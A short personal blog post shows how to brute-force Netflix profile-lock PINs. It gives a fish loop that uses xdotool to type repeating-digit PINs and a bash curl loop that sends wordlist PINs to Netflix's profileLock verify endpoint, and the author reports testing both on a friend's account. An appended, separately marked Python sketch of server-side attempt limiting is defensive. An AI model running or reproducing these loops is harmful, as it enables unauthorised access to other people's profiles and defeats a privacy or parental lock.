lcat
My personal /var/log

How to bruteforce Netflix profile PIN

This is just a proof of concept.

```fish
sleep 3; for i in (seq 0 99); set pin (printf '%02d%02d' $i $i); for pd in (echo $pin | fold -w1); xdotool type $pd; sleep 0.05; end; sleep .5; echo $pin; end
```

Netflix is smart enough (I guess) to somehow throttle the input handling to try to mess things up if bruteforce is detected. The above code only performs bruteforce for repeating 2 digits (e.g. 1919, 1717). I think the pattern is common for Netflix profiles (*why would anyone pick a hard pin combo just to watch a movie?*).

Tested on my friend's Netflix lol (hi zes)

UPDATE: I just read [this](https://vaaibhavsharma.medium.com/bypassing-netflix-profile-lock-66bef9174cc6). I tried it, and it worked. It works even better(?). My command is something like:

```bash
while read -r pin; do printf "$pin -- "; curl 'https://www.netflix.com/api/shakti/mre/profileLock' [LONG PASTED CURL COMMAND FROM CHROME DEVTOOLS] --data-raw '{"pin":"'$pin'","action":"verify","guid":"hehe","authURL":"hehe.hehe="}' -w '%{http_code}\n'; done < <(curl -s 'https://raw.githubusercontent.com/vaaibhavsharma/netflixprofilelock/refs/heads/main/fullWL.txt')
```

I tried a similar technique a few months ago but it didn't work -- must've missed something.
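
The request loop above only pays off when the verify endpoint keeps evaluating wrong PINs for the same profile. The sketch below is an added example of the server-side control that closes that gap, not code from this post or from Netflix; the class name, function name, thresholds and the `acct-1`/`profile-1` identifiers are assumptions made for illustration.

```python
import hmac
import time

MAX_FAILURES = 5        # assumed: wrong PINs allowed before a lockout
BASE_LOCK_SECONDS = 60  # assumed: first lockout; doubles on every repeat


class PinAttemptLimiter:
    """Server-side failure counter keyed on (account, profile), not IP or session."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._state = {}  # key -> (failures, lockouts, locked_until)

    def verify(self, account_id, profile_guid, submitted_pin, real_pin):
        key = (account_id, profile_guid)
        failures, lockouts, locked_until = self._state.get(key, (0, 0, 0.0))
        now = self._clock()
        if now < locked_until:
            return "locked"  # rejected before comparing, so no guess is evaluated
        if hmac.compare_digest(submitted_pin.encode(), real_pin.encode()):
            self._state.pop(key, None)  # success clears the failure history
            return "ok"
        failures += 1
        if failures >= MAX_FAILURES:
            locked_until = now + BASE_LOCK_SECONDS * 2 ** lockouts
            failures, lockouts = 0, lockouts + 1
        self._state[key] = (failures, lockouts, locked_until)
        return "denied"


def simulate_day(real_pin="7391", seconds=86_400):
    """Constructed scenario: one request per second at one profile for 24 hours.
    Returns (guesses the server actually evaluated, whether the PIN was found)."""
    now = [0.0]
    limiter = PinAttemptLimiter(clock=lambda: now[0])
    candidate = evaluated = 0
    for tick in range(seconds):
        now[0] = float(tick)
        result = limiter.verify("acct-1", "profile-1", f"{candidate:04d}", real_pin)
        if result == "locked":
            continue  # the client learns nothing and must retry the same PIN
        evaluated += 1
        if result == "ok":
            return evaluated, True
        candidate += 1
    return evaluated, False
```

With these assumed thresholds, a client sending one request per second gets 55 guesses evaluated in 24 hours, against the 10,000 needed to cover every 4-digit PIN.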
Created: 2024-10-18 13:21:42, Updated: 2024-11-11 18:51:23, ID: 1b11d9c2-49ca-4b7e-a5e9-78f3fa47df2d